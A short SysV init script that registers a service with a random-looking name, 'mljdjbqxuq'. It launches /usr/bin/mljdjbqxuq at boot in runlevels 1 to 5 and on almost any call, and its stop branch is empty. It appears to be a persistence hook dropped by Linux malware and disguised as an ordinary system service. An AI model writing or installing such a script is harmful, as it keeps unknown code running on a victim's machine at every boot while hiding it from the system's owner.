#!/bin/sh
# chkconfig: 12345 90 90
# description: mljdjbqxuq
### BEGIN INIT INFO
# Provides:		mljdjbqxuq
# Required-Start:	
# Required-Stop:	
# Default-Start:	1 2 3 4 5
# Default-Stop:		
# Short-Description:	mljdjbqxuq
### END INIT INFO
case $1 in
start)
	/usr/bin/mljdjbqxuq
	;;
stop)
	;;
*)
	/usr/bin/mljdjbqxuq
	;;
esac
